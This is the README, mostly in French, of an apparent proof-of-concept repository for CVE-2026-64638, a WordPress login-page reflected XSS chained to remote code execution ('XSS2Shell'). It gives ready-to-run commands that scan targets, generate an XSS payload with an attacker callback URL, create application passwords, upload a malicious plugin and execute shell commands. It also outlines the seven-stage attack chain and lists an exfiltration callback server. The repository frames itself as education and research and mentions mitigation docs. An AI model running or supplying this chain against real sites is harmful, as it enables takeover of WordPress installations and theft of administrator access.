
CVE-2026-64638: WordPress Pre-auth XSS → RCE (XSS2Shell) PoC
XSS réfléchi pré-authentification → Exécution de code à distance dans le noyau WordPress
⚠️ AVERTISSEMENT : Ce dépôt est destiné uniquement à la recherche en sécurité autorisée et à des fins éducatives. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous ne disposez pas d'une autorisation écrite explicite de test. L'accès non autorisé est illégal. Voir SECURITY.md.
CVE-2026-64638 est un XSS réfléchi pré-authentification dans le pipeline de traitement de connexion/wplogin du noyau WordPress. Le défaut provient d'un différentiel de parseur où une entrée malformée survit à strip_tags() de PHP mais est ensuite reconstruite en HTML par wp_kses_post(), permettant à du balisage contrôlé par l'attaquant d'atteindre le DOM.
Les chercheurs de pwn.ai ont démontré XSS2Shell — une chaîne qui élève ce XSS en exécution complète de code PHP sur une installation WordPress par défaut lorsqu'un administrateur authentifié interagit avec du contenu contrôlé par l'attaquant.
| Propriété | Valeur |
|---|---|
| CVE | CVE-2026-64638 |
| CVSS | 8.9 |
| Type | Chaîne XSS réfléchi → RCE |
| Composant | Page de connexion du noyau WordPress |
| Versions affectées | WordPress < 7.0.3 (rétroportages jusqu'à 4.7) |
| Correctif | WordPress 7.0.3 (6 août 2026) |
| Cause racine | Différentiel de parseur : strip_tags() vs wp_kses_post() |
git clone https://github.com/<your>/CVE-2026-64638-POC.git
cd CVE-2026-64638-POC
# One command — spin up vulnerable WordPress 7.0.2 + run full chain
./test.sh up
./test.sh chain
Ce qui se passe :
[STAGE 1] WordPress 7.0.2 → VULNERABLE
[STAGE 2] XSS payload URL generated
[STAGE 3] Application Password created
[STAGE 4] Plugin uploaded + activated
[STAGE 5] RCE → uid=33(www-data)
./test.sh up # Start Docker + install WordPress (admin/admin123)
./test.sh scan # Detect version & patch status
./test.sh chain # Run full XSS2Shell RCE chain
./test.sh all # up + scan + chain (all-in-one)
./test.sh down # Stop containers
./test.sh clean # Stop + remove all volumes
# Or with Make
make up # Start Docker
make install # Install WordPress
make scan # Check vulnerability
make gen-xss # Generate XSS payload URL
make test-chain # Full RCE chain
make serve # Start callback server on :8080
make down # Stop containers
CVE-2026-64638-POC/
├── README.md
├── SECURITY.md # Security policy & disclaimer
├── docker-compose.yml # WordPress 7.0.2 + MySQL 8 + WP-CLI
├── Makefile # Shortcut commands
├── test.sh # Automated test suite
├── requirements.txt # Python dependencies
│
├── xss2shell_chain.py # [MAIN] Full chain: scan → XSS → app-password → plugin → RCE
├── xss2shell_scanner.py # Version detection + username reflection test
├── xss2shell_checker.py # Lightweight patch checker (safe, non-exploitative)
├── exploit_server.py # Callback server for XSS exfiltration
├── xss_payload.html # Interactive XSS PoC (browser)
│
└── docs/
├── CHAIN.md # Technical breakdown of all 7 chain stages
├── MITIGATION.md # Defensive guidance + detection rules
└── PAYLOAD_NOTES.md # Notes on the CVE-specific bypass payload
python3 -m venv .venv && source .venv/bin/activate
pip install -r requirements.txt
# Scan target
python3 xss2shell_chain.py scan -u https://target.example.com
# Generate XSS payload
python3 xss2shell_chain.py gen-xss -u https://target.example.com -c http://your-ip:8080
# Full chain (requires WordPress admin credentials)
python3 xss2shell_chain.py chain \
-u https://target.example.com \
--user admin --pass "password" \
--cmd "id"
# Individual stages
python3 xss2shell_chain.py stage-apppass -u URL --user U --pass P
python3 xss2shell_chain.py stage-plugin -u URL --apppass "PASS"
python3 xss2shell_chain.py stage-rce -u URL --cmd "whoami"
Voir docs/CHAIN.md pour tous les détails.
┌─────────────────────────────────────────────────────────────────┐
│ 1. Reflected XSS on wp-login.php (failed-login error page) │
│ 2. DOM clobbering to manipulate page context │
│ 3. JSONP / Same-Origin Method Execution (SOME) │
│ 4. Application Password creation via REST API │
│ 5. REST API access with stolen Application Password │
│ 6. Malicious plugin/theme upload │
│ 7. PHP code execution → full RCE │
└─────────────────────────────────────────────────────────────────┘
Remarque : Les étapes 3 à 7 nécessitent qu'un administrateur connecté interagisse avec la charge utile XSS. La vulnérabilité est pré-authentification, mais la chaîne RCE complète nécessite un accès de niveau administrateur pour aboutir.
Voir docs/MITIGATION.md pour des règles détaillées de durcissement et de détection.
Recherche en sécurité & PoC. À des fins éducatives uniquement.
MIT — Voir LICENSE